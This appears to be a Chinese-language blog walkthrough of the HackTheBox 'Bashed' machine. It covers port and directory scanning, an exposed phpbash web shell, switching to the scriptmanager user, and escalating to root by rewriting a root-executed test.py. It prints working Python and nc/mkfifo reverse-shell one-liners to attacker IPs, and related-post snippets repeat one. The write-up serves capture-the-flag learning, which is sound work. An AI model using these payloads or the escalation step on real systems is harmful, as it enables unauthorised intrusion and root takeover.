hackthebox-bashed (考点:phpbash,linux修改脚本)

最新推荐文章于 2024-01-06 23:48:57 发布
最新推荐文章于 2024-01-06 23:48:57 发布
阅读量678 收藏
点赞数
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45527786/article/details/105451820
本文详细介绍了在hackthebox挑战中如何利用phpbash漏洞,首先通过nmap发现80端口并使用dirbuster扫描,然后利用phpbash创建远程shell。接着,通过切换用户scriptmanager进行权限提升。最后,利用对test.py脚本的修改权限,通过root执行该脚本实现提权至root权限。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1、nmap

在这里插入图片描述

就一个80.
打开看看都很直白提示了是phpbash
拿dirbuster扫一扫

在这里插入图片描述
看到phpbash,点进去。进入网页版bash

2、phpbash漏洞利用

把这个shell弹到我本机来
命令有很多,但我试了几个没反应
最后这个OK

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.57",31337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

收到后,如果是非tty,看不到字的那种shell,参考swagshop

老套路linpeash.sh
发现这俩个在这里插入图片描述
在这里插入图片描述
也就是还有个用户是scriptmanager。

3、提权至scriptmanager

而我www-data的shell又有权力无密码切成scriptmanager

输入sudo -u scriptmanager /bin/bash
切换成功

4、提权至root

再用linpeas扫一扫,这回是以scriptmanager的角度,看能否扫出新东西。另外我发现linpeas在扫进程不如pspy。接着再补pspy来扫

我发现script路径我有整个修改&写的权限,毕竟我是scriptmanager。虽然我搜了下也没太明白这个,但从字面意思就是管理script这些文件的

其中test.py我也有写的权限,这个py脚本在这里很突兀。可能是可以利用的,比如我把脚本改成弹shell的呢?

接着在pspy的扫描里,果然发现了是root (uid0)在执行这个py。既然root在执行这个py,我又可以改写这个py,那我就改写内容改成弹shell给我的内容,root在执行时就会把root shell弹给我,这就是提权思路。

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
就很简单了。有些命令搞不定,不知为何,最后用这个OK
进入scripts路径下。修改文件内容,直接一句话

echo "import os;os.system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.24 4444 >/tmp/f')" > test.py

收到,搞定
在这里插入图片描述

冬萍子
关注
HackTheBox-Bashed渗透测试
weixin_43111940的博客
04-13 390
端口信息,只开了80端口 目录扫描 gobuster dir -u http://10.10.10.68 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x 'html,php,asp,aspx,zip,rar' /dev/目录下有php的shell文件 通过执行命令可以判断是Linux系统,因为对命令的大小写敏感 既然可以执行命令,尝试一下用反弹shell命令,尝试了php,Linux的反弹命令,但是没有拿到she
HTB靶场系列 Linux靶机 Bashed靶机
m0_57221101的博客
01-10 1437
勘探 惯例先用nmap扫描一下端口,发现开了80端口 ┌──(root????Mr)-[~/dirsearch] └─# nmap 10.10.10.68 Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-12 14:30 CST Nmap scan report for 10.10.10.68 Host is up (1.2s latency). Not shown: 999 closed ports PORT STATE SERVICE 80/
Hack the box靶机 bashed
菜浪马废的博客
05-07 435
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.27",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subp...
Bashed -- hack the box
neal1991的专栏
04-04 582
IntroductionTarget: 10.10.10.68 (OS: Linux)Kali linux: 10.10.16.44Information Enumera...
HackTheBox::Bashed
aya3t的博客
10-11 522
HackTheBox::Bashed
HTB-hackthebox-Bashed
yutianovo的博客
03-01 583
靶机描述 清单 信息搜集 nmap dirsearch 未受到保护的危险php文件 提权 sudo -l 定时脚本 信息搜集 靶机IP 端口扫描 nmap 10.10.10.68 Not shown: 999 closed ports PORT STATE SERVICE 80/tcp open http 80 页面内容如下 介绍了 phpbash https://github.com/Arrexel/phpbash 功能是在 Web 页面里可以像交互式shell 一样进行
murmurhash.c:MurmurHash3通用hash bashed查找函数实现
06-20
MurmurHash3通用hash bashed查找函数实现 关于 是一种非加密哈希函数,适用于一般的基于哈希的查找。 此实现实现了 MurmurHash 的第 3 版。 安装 : $ clib install jwerle/murmurhash.c 来源: $ git clone git@...
纯Bash打造快速Linux Git Prompt指南
根据给定文件信息,本知识点将围绕Linux操作系统中的Bash脚本编写,以及Git提示符(prompt)的自定义展开讨论。我们将从标题和描述中提取关键信息,并结合压缩包子文件的名称来深入分析。 首先,标题“linux-采用纯...
shed:替代curl | sh的安全验证工具
shed的核心功能是将通过管道传递的脚本保存到临时文件中,之后会在指定的编辑器中打开这个临时文件,让用户查看和修改脚本内容。在用户确认后,shed会询问是否继续执行脚本,并保留用户所做的修改。shed是一个用...
hack the box靶场练习之bashed
qq_44767905的博客
02-06 360
hack the box靶场练习之bashed
提权信息收集自动化脚本-LinPEAS
04-10
该工具是纯bash脚本,通用性很好,能够收集上述几乎所有的提权信息,足够全面。但运行时间长,效率低,得到的信息虽然全面,但重点不够突出,有较多无用信息,稍显冗杂。 使用方式为: ./linpeas.sh
No.122-HackTheBox-Linux-Bashed-Walkthrough渗透学习
qq_34801745的博客
06-04 434
** HackTheBox-Linux-Ariekei-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/118 靶机难度:初级(4.5/10) 靶机发布日期:2017年12月20日 靶机描述: Bashed is a fairly easy machine which focuses mainly on fuzzing and locating important files. As basic access to th
Haystack - hack the box
neal1991的专栏
11-30 695
Introduction Target: 10.10.10.115(Linux) Kali: 10.10.16.61 HayStack is an easy box in hack the box. But it does isn't easy at all. It's annoying to find the user and password in the messy Spanis...
Linpeas的简单使用
最新发布
Themanager112的博客
01-06 4001
是一个流行的脚本,用于在渗透测试中进行特权升级和系统枚举。要在 Kali Linux 中使用。在没有授权的情况下对系统运行渗透测试工具可能违法。并不是预装的工具,因此你不会在标准安装中找到它。,你需要手动下载和运行它。: 你可以从其 GitHub 仓库下载。请确保在合法和授权的环境中使用。在 Kali Linux 中,
Linux权限提升:自动化信息收集
bdfcfff77fa的博客
07-28 1105
在本文中,我们将介绍在基于Linux的设备上进行初始访问后,可用于后渗透阶段漏洞利用和枚举的一些自动化脚本
Tre靶场通关过程(linpeas使用+启动项编辑器提权)
tpaer的博客
05-07 2630
通过信息收集获得到了普通用户账号密码,利用PEASS-ng的linpeas脚本进行提权的信息收集再进行提权。
全平台系统提权辅助工具 PEASS-ng
LuckySec
04-27 8750
0x01 PEASS-ng 介绍 PEAS-ng 是一款适用于 Windows 和 Linux/Unix* 和 MacOS 的权限提升工具。 项目地址:https://github.com/carlospolop/PEASS-ng PEAS-ng 工具搜索可能的本地权限提升路径,可以利用这些路径并将它们以漂亮的颜色打印输出,可以方便轻松识别错误配置。 检查来自book.hacktricks.xyz的本地 Windows 权限提升清单 WinPEAS - Windows 本地权限提权脚本(C#.exe
文件上传漏之Durian靶场练习(完整版)——学习日记-渗透day14
qq_62716256的博客
09-14 2092
文件上传漏之Durian靶场练习(完整版)——学习日记-渗透day14
【网络安全】记一次红队渗透实战项目
kali_Ma的博客
01-30 9270
mcrypt 是php里面重要的加密支持扩展库,主要是用mcrypt 扩展库中各种加密函数对用户输入内容进行转换功能。就是用户输入的数据转换为base64编码和解码功能,还有将字符串转换为 8-bit 字符串功能。PHP存在四种过滤器:PHP 过滤器用于验证和过滤来自非安全来源的数据,比如用户的输入。root权限pip,PIP是Python包或模块的包管理器,包含模块所需的所有文件。没发现新的东西,但是可看到devops的ID为1002是共用的!lang= ,出现这种形式,很可能是sql注入或文件包含。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值